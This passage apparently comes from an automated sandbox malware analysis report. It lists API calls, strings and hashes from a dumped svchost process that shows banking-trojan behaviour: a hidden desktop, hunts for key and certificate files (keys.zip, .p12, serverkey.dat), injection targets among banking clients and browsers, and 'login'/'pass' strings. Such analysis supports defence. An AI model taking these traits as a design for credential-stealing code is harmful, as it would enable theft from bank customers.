                                                                                                                                                                                                                  • Part of subcall function 02D44B30: GetProcessHeap.KERNEL32(00000008,00000110), ref: 02D44B79
                                                                                                                                                                                                                  • Part of subcall function 02D44B30: HeapAlloc.KERNEL32(00000000), ref: 02D44B7C
                                                                                                                                                                                                                  • Part of subcall function 02D44B30: memset.MSVCRT ref: 02D44B90
                                                                                                                                                                                                                  • Part of subcall function 02D44B30: RegQueryValueExA.ADVAPI32(?,Shell,00000000,00000001,00000000,00000104), ref: 02D44BB0
                                                                                                                                                                                                                  • Part of subcall function 02D44B30: RegCloseKey.ADVAPI32(?), ref: 02D44BC0
                                                                                                                                                                                                                  • Part of subcall function 02D44B30: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D44BD1
                                                                                                                                                                                                                  • Part of subcall function 02D44B30: HeapValidate.KERNEL32(00000000), ref: 02D44BD4
                                                                                                                                                                                                                  • Part of subcall function 02D44B30: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D44BE1
                                                                                                                                                                                                                  • Part of subcall function 02D44B30: HeapFree.KERNEL32(00000000), ref: 02D44BE4
                                                                                                                                                                                                                • CreateDesktopA.USER32 ref: 02D293BF
                                                                                                                                                                                                                • SetThreadDesktop.USER32(00000000), ref: 02D293DA
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D293E8
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32 ref: 02D29420
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(?,00000000), ref: 02D29442
                                                                                                                                                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 02D29461
                                                                                                                                                                                                                • GetShellWindow.USER32 ref: 02D2946D
                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 02D29482
                                                                                                                                                                                                                • GetShellWindow.USER32 ref: 02D29484
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,000000FF), ref: 02D294B1
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 02D294C3
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,000000FF), ref: 02D294DD
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D294EF
                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 02D294F5
                                                                                                                                                                                                                • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 02D29506
                                                                                                                                                                                                                • SetThreadDesktop.USER32(?), ref: 02D2959E
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D295AF
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32 ref: 02D295ED
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(?,00000000), ref: 02D2960F
                                                                                                                                                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 02D29631
                                                                                                                                                                                                                • GetShellWindow.USER32 ref: 02D2963D
                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 02D29652
                                                                                                                                                                                                                • GetShellWindow.USER32 ref: 02D29654
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00000024), ref: 02D29683
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 02D29691
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00000024), ref: 02D296AB
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 02D296B9
                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 02D296BF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Window$Heap$CloseDesktopProcess$InformationPathShell$Creatememset$AppendFolderSleepThread$AllocFindFreeOpenQueryValidateValue
                                                                                                                                                                                                                • String ID: D$D$Shell_TrayWnd$a1633b6ba$explorer.exe
                                                                                                                                                                                                                • API String ID: 3365957849-948391127
                                                                                                                                                                                                                • Opcode ID: e303108a0626af89000fb9d36f595464a3f4d4194c507256212427529b327d2b
                                                                                                                                                                                                                • Instruction ID: bf2ca970ec038ed208cf767c7afe851fc96fcac4bc77f56fc32a69b1605773bd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e303108a0626af89000fb9d36f595464a3f4d4194c507256212427529b327d2b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCB1ADB2944351AFD710DF64E898AAB7BE8FB88258F544D2EF589C3300E7748C59CB61
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D427DE
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D427F8
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02D42822
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC473), ref: 02D42847
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02D42887
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D42891
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D42899
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02D428AA
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D428B1
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 02D428F4
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(00000000), ref: 02D42940
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC473,00000000,00000000), ref: 02D42987
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
                                                                                                                                                                                                                • String ID: 5E8DC473$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
                                                                                                                                                                                                                • API String ID: 1576442920-192137239
                                                                                                                                                                                                                • Opcode ID: 19541674ed55cd52fedf631e1237f51a466fd5e589a18d1c1d209e581154b8f1
                                                                                                                                                                                                                • Instruction ID: af30682b0e001808c4d6dc18ede8c223b60cb0585a36e460c196ae4ab79d9262
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19541674ed55cd52fedf631e1237f51a466fd5e589a18d1c1d209e581154b8f1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DED1F1309042559FDB258F24A86CBEA7BE5EF45300F588595ECCAD7341EF719E88CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FindWindowW.USER32(00000000,02D6A918), ref: 02D43BA8
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02D43BB9
                                                                                                                                                                                                                • FindWindowW.USER32(00000000,02D6A918), ref: 02D43BC2
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D43BD6
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,core.exe), ref: 02D43BEE
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 02D43C19
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\data\id.dbf), ref: 02D43C4F
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D19C), ref: 02D43C77
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D43CB5
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D43CBF
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D43CC7
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D43CD8
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D43CDF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$ErrorFileFindLastWindow$AdminBackslashCreateDirectoryExistsFolderMakeModuleNameSleepSystemUser
                                                                                                                                                                                                                • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$\data\id.dbf$core.exe$data\id.dbf$keys%i.zip$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                                • API String ID: 109093349-643081521
                                                                                                                                                                                                                • Opcode ID: 7a1b9444166e7dc3cd5831b0b7fd98d92eb28ba83dbabd150f62c259eea445c4
                                                                                                                                                                                                                • Instruction ID: 2e5bd6d031b1091f94c64e935af3395fa4daf0ec3b845115af545a2a6894e604
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a1b9444166e7dc3cd5831b0b7fd98d92eb28ba83dbabd150f62c259eea445c4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DBC1FC3190064A5FDB168F3C98687EA7BE5AF49300F6449E5E885D7340EF71DD48CB60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D3E1CF
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D3E1F1
                                                                                                                                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02D3E206
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 02D3E21F
                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(?), ref: 02D3E268
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02D3E27B
                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 02D3E2DD
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 02D3E5F3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DriveErrorModememset$CurrentDirectoryFileFindFirstLogicalStringsType
                                                                                                                                                                                                                • String ID: *.00*$.txt$.zip$5E8DC03F$asus$found.$keys$path
                                                                                                                                                                                                                • API String ID: 989413159-4189423734
                                                                                                                                                                                                                • Opcode ID: 2b4080cc6cc7a2ee94818337d6e3cbe709400ef61ff98591185bd45c84b8f01d
                                                                                                                                                                                                                • Instruction ID: 6928cf9adcca0b5f9f544cba0007dde1fd174cc2d416ae932a563c86ef9e79e1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b4080cc6cc7a2ee94818337d6e3cbe709400ef61ff98591185bd45c84b8f01d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AC1C2315083459FC726CF24D468BABBBE5AF89304F548A5CE8C6D7380EB31D948C7A1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02D2CC4A
                                                                                                                                                                                                                • IsIconic.USER32(?), ref: 02D2CC55
                                                                                                                                                                                                                • GetWindowInfo.USER32(?,?), ref: 02D2CCB2
                                                                                                                                                                                                                • GetAncestor.USER32(?,00000003,?,75C0BCB0,75BF3EB0), ref: 02D2CCD7
                                                                                                                                                                                                                • GetWindow.USER32(?,00000003), ref: 02D2CD50
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02D2CD78
                                                                                                                                                                                                                • IsIconic.USER32(?), ref: 02D2CD83
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D2CDB2
                                                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 02D2CDD6
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02D2CDD9
                                                                                                                                                                                                                  • Part of subcall function 02D2DA30: GetClassNameA.USER32(?,?,00000101), ref: 02D2DA46
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Iconic$AncestorClassInfoNamememset
                                                                                                                                                                                                                • String ID: <$<
                                                                                                                                                                                                                • API String ID: 3351429209-213342407
                                                                                                                                                                                                                • Opcode ID: 87c8694f373e03c02a471c488c68e4438a3c3c7a6556627d5d185dd251543315
                                                                                                                                                                                                                • Instruction ID: 7c484f48de8dd97d6a170c5cea48647488d5da1fe3216d64d7c9563c9ddfdec5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87c8694f373e03c02a471c488c68e4438a3c3c7a6556627d5d185dd251543315
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCD1D270D102289FDB20DFA4DC88BAEBBB9EF54718F15415AE405A3380DB709D89CFA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D2118E
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,74DEF570), ref: 02D211AD
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,java), ref: 02D211C5
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,.exe), ref: 02D211DB
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,.p12,00000000), ref: 02D211FF
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02D21221
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02D2123E
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D21245
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D21255
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02D21271
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3AFC0,00000000,00000000,00000000), ref: 02D21285
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,serverkey.dat,00000000), ref: 02D212A4
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02D212D5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02D212F2
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D212F9
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D21309
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02D21325
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3E630,00000000,00000000,00000000), ref: 02D21339
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3FCA0,00000000,00000000,00000000), ref: 02D21376
                                                                                                                                                                                                                  • Part of subcall function 02D3AF10: PathAddBackslashA.SHLWAPI(5e8dc0d9), ref: 02D3AF37
                                                                                                                                                                                                                  • Part of subcall function 02D3AF10: PathFileExistsA.SHLWAPI(?), ref: 02D3AFA0
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D2138E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D2139F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
                                                                                                                                                                                                                • String ID: .exe$.p12$java$serverkey.dat
                                                                                                                                                                                                                • API String ID: 183229269-3502489836
                                                                                                                                                                                                                • Opcode ID: 19bf520fcc83ee62a0caf1359eecfbbe7ff8efe4293ee52ad83f62aecb105e7e
                                                                                                                                                                                                                • Instruction ID: d37e129924de61e4d55e1f4cbb8252f642473187aa58b7fcb2b7a1011d6fcdab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19bf520fcc83ee62a0caf1359eecfbbe7ff8efe4293ee52ad83f62aecb105e7e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB51D571E852357AEB305A619C4DFAB3B5C9F11B58F248244FD48A93C1EB60DC88CAF0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExitThread$Startupsocket
                                                                                                                                                                                                                • String ID: login$pass
                                                                                                                                                                                                                • API String ID: 1705285421-2248183487
                                                                                                                                                                                                                • Opcode ID: c3fffaab4f0ba5d945c29e13f82c012b47a21e114c7e119977174eaabb4d35e3
                                                                                                                                                                                                                • Instruction ID: 0c4e0dbb0e297a9e5e9c3dc4f6a5ba94eb75de16f4b6ac478fe3d3e30dca141b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3fffaab4f0ba5d945c29e13f82c012b47a21e114c7e119977174eaabb4d35e3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2517D35948301AFD300DF64E89CBAA7BE5BB89721F544A0DFAA5873C0D7B09D54CB62
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D44800: memset.MSVCRT ref: 02D44824
                                                                                                                                                                                                                  • Part of subcall function 02D44800: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D4482F
                                                                                                                                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,ctunnel.exe,?,75B07390,?), ref: 02D3C92C
                                                                                                                                                                                                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02D3C94B
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D3C95D
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3C96E
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3C997
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3C9D1
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3C9DB
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3C9E3
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3C9F4
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3C9FB
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02D3CA31
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02D3CA70
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC08D,?,?), ref: 02D3CAB7
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC08D,ctunnel.exe,?,75B07390,?), ref: 02D3CB97
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 02D3CBF9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashFile$CreateDirectoryErrorHandleLast$AdminAttributesCloseCurrentExistsFolderInformationMakeModuleNameOpenProcessSnapshotSystemToolhelp32Usermemset
                                                                                                                                                                                                                • String ID: 5E8DC08D$\$ctunnel.exe$ctunnel.zip$pass.log$path_ctunnel.txt
                                                                                                                                                                                                                • API String ID: 3886636124-2971231654
                                                                                                                                                                                                                • Opcode ID: 51489b30db698f0c69d9886b2d87298ba0da72792e21beb4191f54656f7364f9
                                                                                                                                                                                                                • Instruction ID: abe152e78f598055446066dfc4225feee43dd8c29969750ccf83553edc35f86c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51489b30db698f0c69d9886b2d87298ba0da72792e21beb4191f54656f7364f9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B91E5319182499FDB12CB24E86CBE67BE5EF45700F2485D5D8CAE7301EB719D88CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D237FE
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02D23814
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,76EEC3F0), ref: 02D23837
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D23849
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 02D23855
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D23864
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,\svchost.exe), ref: 02D2387A
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D23894
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D238A0
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 02D238AC
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D238C1
                                                                                                                                                                                                                • PathFindFileNameA.SHLWAPI(00000000), ref: 02D238CE
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,00000000), ref: 02D238DA
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D238E4
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,\winlogon.exe), ref: 02D238F6
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D23900
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,\explorer.exe), ref: 02D23912
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex, xrefs: 02D238D5
                                                                                                                                                                                                                • \winlogon.exe, xrefs: 02D238EA
                                                                                                                                                                                                                • \explorer.exe, xrefs: 02D23906
                                                                                                                                                                                                                • kernel32.dll, xrefs: 02D2382B, 02D23888
                                                                                                                                                                                                                • IsWow64Process, xrefs: 02D23843, 02D2389A
                                                                                                                                                                                                                • \svchost.exe, xrefs: 02D2386E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdminUser$Module$AddressCurrentFileHandleNameProcProcess$FindPathmemset
                                                                                                                                                                                                                • String ID: IsWow64Process$\explorer.exe$\svchost.exe$\winlogon.exe$iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex$kernel32.dll
                                                                                                                                                                                                                • API String ID: 1410231462-2095515203
                                                                                                                                                                                                                • Opcode ID: daed96b4dcaa453106a9a171935c40ed3eb4e75b8543d5c70027193a5e401ef2
                                                                                                                                                                                                                • Instruction ID: 522e57e6d3b65e4be1304d58002781ec62e45745319f79a70bc177b1bc2bd956
                                                                                                                                                                                                                • Opcode Fuzzy Hash: daed96b4dcaa453106a9a171935c40ed3eb4e75b8543d5c70027193a5e401ef2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70319C71E40325A7F7609BB1AD0CBA9776C5F24B09F440495E945E6340DBB8DD9CCB70
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 02D2CE28
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D2CE6B
                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,00000000), ref: 02D2CE7B
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 02D2CE95
                                                                                                                                                                                                                • GetScrollBarInfo.USER32(00000000,000000FA,?,?,75C0BCB0,75BF3EB0), ref: 02D2CEB0
                                                                                                                                                                                                                • GetScrollBarInfo.USER32(00000000,000000FB,0000003C,?,75C0BCB0,75BF3EB0), ref: 02D2CEDD
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02D2CF15
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02D2CF18
                                                                                                                                                                                                                • IsIconic.USER32(00000000), ref: 02D2CE37
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: IsWindow.USER32(00000000), ref: 02D2C79D
